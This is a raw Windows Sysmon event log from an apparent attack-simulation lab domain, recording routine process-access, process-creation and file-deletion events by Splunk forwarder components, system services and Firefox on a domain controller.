10341000x80000000000000001046094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.178{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2F2-60EB-F07C-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.179{466BC892-F2F2-60EB-F07C-00000000CF01}9000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806206Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:51.844{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56F2E34DB5325F8C525DA93F028B940F,SHA256=71C3C88AA33F27EDB3348DAC17861766F43B07BE7ED1DCE12BE1595733970C41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.893{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D2F4A4F2E882B76C51B4AF49E12BB40,SHA256=6EC0A6CA18AE60BC968F20DEFF1AAA102B7C6A16D55F1DF611E769AE62B80997,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.762{466BC892-F2F3-60EB-F27C-00000000CF01}16165516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.539{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2F3-60EB-F27C-00000000CF01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.539{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.539{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.539{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.539{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.539{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F2F3-60EB-F27C-00000000CF01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.539{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2F3-60EB-F27C-00000000CF01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.524{466BC892-F2F3-60EB-F27C-00000000CF01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:51.224{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0154156110DF4FDE220E8189267E7D7E,SHA256=774611E52C2093D3F3B317BD24633E332D1B7EEFDD8CBE00BCCE2EADAE1AC586,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806207Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:52.844{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBCB31A0BFC08DD4433B3049F683FD36,SHA256=22DDCCE759D020A8FD18F3C8F55B1063371FA97F24755857E991275709B78CE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.939{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7CC0BED66E5CE94869B3BF183C7D7154,SHA256=F772E409BF98F2EA72E1FA6BB7E10E7F81808EE87EA9784BA21B882533481481,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.939{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C1E7FA8A01BF47C458B284524729021A,SHA256=55103CCAB1EF2BE5AFBB1B571ACD9FD7EBD5BB27489CB4BAA02ED868AD5EC243,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CF95448B20677C31CB50791B6C85FDE1,SHA256=B8711BF73122F6948B589DBF3080625909B0B2135988175232D6E1F341B397CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A60B05F15A1B6351C95A38D9AFF2D911,SHA256=4BF692EBEE26B5B357941B814B0494FFA71AD5B227999CF1E99E5845B1BEF3CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=584A77D2639841CCACC09C35E39D8AB2,SHA256=B72DCA7CC3DE676271911B7183D89C8CD9E035930732DF7256CA496B265476D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=17AC8551F007758C5CF8E818FB5E8687,SHA256=C2B62B3DD6764497D5D4DCDA9171BE34B1F215B7314591C015CC58DF60B06B76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D474F9325FC4A137D26A11F296AEF2E,SHA256=1F1E15EDA6F88EAFC0DF828D1DC1C8D4872A00F23E85868C750D23737F208A41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=052FC0DD94EA7C6D6EA32398D83B9607,SHA256=524DB6EB8009D1B66E53C27AF7C2446E58E17CD1E0C92EEA14E306C01B01267A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=54BB465867E2C818AF5473633E84F4B0,SHA256=67B8E8FAC23A34ABB30DE94279CF93D6905532D2FE0F45161671C6E9AD470BE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1090195F3B89EB0F49D9C560B06EEA18,SHA256=FCD670367CA6225CD415B5FE8F6E4F1BD6F395FF73885EAB11AAFC8A35856885,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D2B4437A625B6F62A9F5B2DFC692D43A,SHA256=75DDAEB182556202C33FF89480E15352525B012141B956C408AFEF2E92006F5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.923{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=AF1671290254A5FAFF105D990E817918,SHA256=B8D8AD6304CE81B86B0D8D65405EDD05572DF757B498E965194871570957EEC3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.892{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2F4-60EB-F47C-00000000CF01}7976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.892{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.892{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.892{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.877{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.877{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F2F4-60EB-F47C-00000000CF01}7976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.877{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2F4-60EB-F47C-00000000CF01}7976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.878{466BC892-F2F4-60EB-F47C-00000000CF01}7976C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:52.524{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 